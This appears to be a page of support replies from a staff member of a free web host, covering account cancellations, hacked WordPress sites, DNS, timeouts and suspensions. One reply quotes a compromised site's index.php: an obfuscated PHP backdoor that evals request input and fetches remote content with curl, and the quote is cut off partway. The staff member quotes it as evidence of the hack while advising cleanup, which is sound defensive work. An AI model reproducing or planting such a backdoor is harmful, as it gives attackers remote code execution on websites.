Krydos

Your subscription has been canceled and you won't be charged again. Your forum account has also been deleted. Thanks for using our VPS service.

Uncheck the wildcard box. It isn't supported yet.

Your subscription has been canceled and you won't be charged again. Thank you for using our VPS service.

Your account has been backed up and you can download it from https://heliohost.org/backup/ if you need. Generally when this happens your database is fine, but I would still take a look through it to see if anything has been altered. We know for a fact that the hacker had access to modify and upload files to your account so do not restore any of the PHP files from this backup. Images and movies might be fine, but I would check them too before restoring them. Your account has been reset so check your email and click the link to take the next step in the reset process. Obviously we recommend not using Wordpress again, but it's up to you. Let us know if you need help with anything.

A password reset link has been emailed to you.

It looks like most of your load is unsurprisingly coming from the Wordpress install root@johnny [/home/xn--plised-pxa.heliohost.org/public_html/300-000]# ls error_log license.txt wp-activate.php wp-comments-post.php wp-content wp-links-opml.php wp-mail.php wp-trackback.php index2222.htm readmeexe.html wp-admin wp-config.php wp-cron.php wp-load.php wp-settings.php xmlrpc.php index.php readme.html wp-blog-header.php wp-config-sample.php wp-includes wp-login.php wp-signup.php

Your $5 donation has been verified and your disk space has been increased to the maximum. Thanks for the donations. Talk Sick is right though. If you need to re-open a solved ticket just edit the first post and change the title to remove the [Solved] then reply with a new post at the bottom of the thread. You can also just create a whole new ticket. The report button is for stuff like spammers, porn posts, and stuff that violates our forums terms of service not just to annoy us.

Removed.

Johnny, Ricky, Tommy, Morty, and Lily do not have terminals. VPS plans have root SSH access if you need a terminal and they start at $4 per month.

The 3 domains that you disabled have been removed from your account.

Your website has clearly been hacked. Here is your index.php <?php /*-lShG;7>-*/error_reporting(0); $QKuU /*-Rkvp._LjJD4;v1&5EJ9-*/=/*-370E1a43815Kz#>F!q7-*/ "ra"./*-ow:piBPtbF;9sjnB9-*/"ng"./*-iZa?[]eaEK>u0kC__1I-*/"e"; $bXlIm /*-<!I=L,Lm%OY,GV%8-*/= /*-{S>C}8kB0WdNo~-*/$QKuU/*-e7$WJgx{>Wp9g-*/(/*-Xq(QWqBFqB?5-*/"~",/*-VRGAur<M{-*/" ");/*-!jRNvWgOAXyov+Z-*/$dUYio/*->NngYm_ah6-*/=/*-FfK)_u>PbnwD6-*/${$bXlIm[1+30]/*-GdwHE5@<dV+~CTK-*/.$bXlIm[9+50]./*-t(qw.Zd7Qh.m9-*/$bXlIm[36+11].$bXlIm[30+17]./*-U%.56.#2^-*/$bXlIm[23+28].$bXlIm[52+1].$bXlIm/*-A>R10o9ptemcm+ujE-*/[28+29]}; /*-AGMLPPJclv,^N-*/if(/*-hl,jyp$[h>QvM-*/in_array(/*-u(0Yj97W}ZucT-*/gettype/*-gT8GMb|vA.It-*/($dUYio).(7+12),$dUYio)){ $dUYio[54+8]=$dUYio[56+6].$dUYio[17+63]; @eval/*-h2DD.nYs~-*/($dUYio[37+25](${$dUYio[15+29]}[15+5]));}/*-rK-*/class /*-XO`-*/a{ /*-cL-*/static/*-1LSZdZE-*/ function /*-wGyM]a-*/cT($AOtJnSrK) /*-u8<q-*/{ $hxGJkYQ/*-Y-#V-*/ = /*-bD{C^-*/"r"./*-`ql[ZF(jU-*/"a"./*-hfOo70-*/"n"./*-L%1RwH-*/"g"./*-OhiJaD,y-*/"e"; /*-vUz;XUA_-*/$AUqwYXSNid/*-~b(bx0nIy-*/ = /*-x|He-*/$hxGJkYQ/*-(>F<.K-*/(/*-uQ!nF`H-*/"~"/*-wDLM-2-*/, /*-)XfXIJ-*/" "/*-:MrC<stK%-*/);/*-pT;-*/ $vPWjkSOid /*-B-*/= /*-wId-*/explode/*-wa<m&.f-*/(/*-9p-*/"!", /*-b![e-*/$AOtJnSrK/*-WWJ-*/); /*-,oN5Su-*/$DurZd /*-KL%wbADaI-*/= /*-84I-*/""; foreach /*-q&x-*/(/*-d)T:L%1;d}-*/$vPWjkSOid /*-vQ0X,@KnS-*/as /*-,rU,2+,Qne-*/$gZ /*-w3-*/=>/*-kqi?Wak5C-*/ $UQW/*-M@a3<-*/) /*-0N!k,-*/$DurZd /*-RK!^X%XgFB-*/.= /*-.#O:c6ED2;-*/$AUqwYXSNid[$UQW/*-Q5sc-*/ - /*-lv-*/65104/*-mr{wa?E-*/];/*-U(O5xm-*/ return /*-F8c-*/$DurZd; /*-W^1&5Kgo-*/} /*-goyS-*/static /*-,-:8-*/function /*-_KAwW@O-*/oyGOLpDQ/*-9Q_-*/(/*-g4|-*/$jGu,/*-0_O!~gc-*/ $yuZK/*-n-z-*/)/*-yo1WC<-*/ {/*-~&nhyn5cN-*/ $hWFzxONLv/*-si^>-*/ = /*-t7P!-*/curl_init/*-%&S##%s-*/(/*-oG%TFbb-*/$jGu/*-_yE}N8XG-*/);/*-tREv-*/ curl_setopt/*-rzRptB#~BV-*/(/*-P%hp-*/$hWFzxONLv,/*-tFFfn`)!uh-*/ CURLOPT_RETURNTRANSFER,/*-@9op-*/ 1/*-_ajOo}gtN1-*/);/*-0(VlqO3-*/ $YbQGo/*-p,Q{1El5-*/ = /*-7qR~G7)-*/curl_exec/*-]#cd?g3lD-*/(/*-2T0iWeEM-*/$hWFzxONLv/*-O.jH-*/); /*-cawA&=Hg!s-*/return /*-R0-*/empty/*-<Y~Tx5&-*/(/*-rxc-*/$YbQGo/*-la6.WE^-*/)/*-Y0}-*/ ? /*-WoQ-*/$yuZK/*-bbr$}Af2h-*/(/*-uZ(XX2^-*/$jGu/*-x|67[=V-*/)/*-rKHX|<4-*/ : /*-#N:c-*/$YbQGo; /*---*/}/*-wP-*/ static/*-:G]-*/ function /*-o-MJiHDA-*/xKQ/*-ep+CZYE_-*/() /*-,0-*/{/*-~%o5~-*/ $TEYA /*-qY9&kKhP-*/=/*-79f-*/ array/*-yO@_7d-*/("65131!65116!65129!65133!65114!65129!65135!65128!65113!65120!65131!65114!65125!65119!65120","65115!65114!65116!65135!65116!65119!65114!65181!65179","65124!65115!65119!65120!65135!65130!65129!65131!65119!65130!65129","65118!65133!65131!65123","65132!65133!65115!65129!65176!65178!65135!65130!65129!65131!65119!65130!65129","65128!65125!65122!65129!65135!65127!65129!65114!65135!65131!65119!65120!65114!65129!65120!65114!65115","65158!65188","65105","65183!65188","65165!65148!65148!65165!65141","65119!65128"); /*-tRz)&6;-*/foreach /*-vS3B-*/(/*-=$q-*/$TEYA/*-0_U!-*/ as /*-J8_y-*/$HdlKfPenMR/*-yT2-*/)/*-2bJonRTTcq-*/ $MT/*-iTgO{Z-*/[] /*-$xnvuJ+w}-*/= /*-oUi-*/self/*-H92e|X!-*/::/*-Zi&H>{M-*/cT/*-ksn3~zF-*/ I made a full backup which you can download from https://heliohost.org/backup/ if you need it. In most cases your database is probably fine, but you should still check it to make sure it hasn't been altered. You should also assume that any passwords you used on this site have been compromised and should be changed. You shouldn't trust any of your files because the hacker clearly had access to modify and upload files. I have reset your account to clean up the hack, and you should click the link in your email to continue with the rebuild process. Let us know if you need help with anything.

Removed.

I commented out the deny from all line in the .htaccess and it seems to be working fine https://xn--plised-pxa.heliohost.org/ Normally you'd see a 403 but this is a weird cPanel transfer account so they do weird things sometimes I guess. If you're having issues with the account I would recommend doing a full backup and then we can reset the account to give you a fresh start and then restore the files and databases that you need back into the fresh working account.

Try settings your NS records to ns1.heliohost.org and ns2.heliohost.org. If it works you can switch it back to Cloudflare later.

Removed.

Python CGI, Django, Flask, Python cron, Python constantly running process such as a bot, or something else?

You had a 658 MB access log for the forum.mupdvig.tk domain. Your high load and disk space overage are certainly related. Haters gonna hate, playas gonna play, and spambots gonna spam. Fix it quickly.

@garrigue Let us know if the All In One WP Migration tool works for you. If it doesn't we could try randomly increasing the timeout again to maybe 5 minutes this time. @artistwalks Thanks for the suggestion. All of the HelioHost staff, myself included, hate Wordpress with a passion because it is constantly getting hacked and causing high load so none of us will touch it with a 10 foot pole. Therefore we know very little about plugins for Wordpress.

I've increased the proxy timeout on that domain from 60 seconds up to 180 seconds so maybe it won't give that error again, but I want to make an observation: Tools are meant to make things quicker and easier. Dumping the database to an .sql file, zipping the files, and restoring the backup to transfer a Wordpress site to another host takes like 5 minutes. How much time should you waste trying to get this transfer tool to work? Should we spend 5 days trying different things to make this Updraft tool work when it only takes 5 minutes to do it manually? Would you spend 5 days driving somewhere when you could walk there in 5 minutes? If it still gives that error after 180 seconds we could try increasing it more.

Forum account, Tommy account, or both?

Thanks for posting this information. If someone has issues with high load we'll suggest this as something to try.

Does the 504 error happen every single time you try, or have you only tried once?

Are you able to access your VPS now?

Yeah, since we're all volunteers and we don't have a full staff of employees working 40 hours a week it takes us a little longer to get stuff like this implemented. Thanks for being understanding, and thanks in advance for the donation. Let us know if you need help with anything else.

The wendyfiore account has been unsuspended. Try logging in with the old password first. Ideally it would be great if our suspension system restored the previous password when an account is unsuspended, but it doesn't always work right and I'm still trying to debug it. If you can't login with your previous password let us know and we can send a password reset link. Yes, we are planning on offering free transfers back to Tommy for previous users when the uptime is better and that server isn't so crowded. We are also going to be releasing a new server named Morty soon that won't require logging in every 30 days and no high load suspensions, etc. It will start at $1 per month, and scale upwards in price to a maximum of $0.57 per day depending on how high your load is on that day. When Morty is released we expect quite a few people to switch from Tommy to Morty and that should make quite a bit of space on Tommy. You could also transfer from Johnny to Morty at that point if you'd prefer to not have to login every 30 days.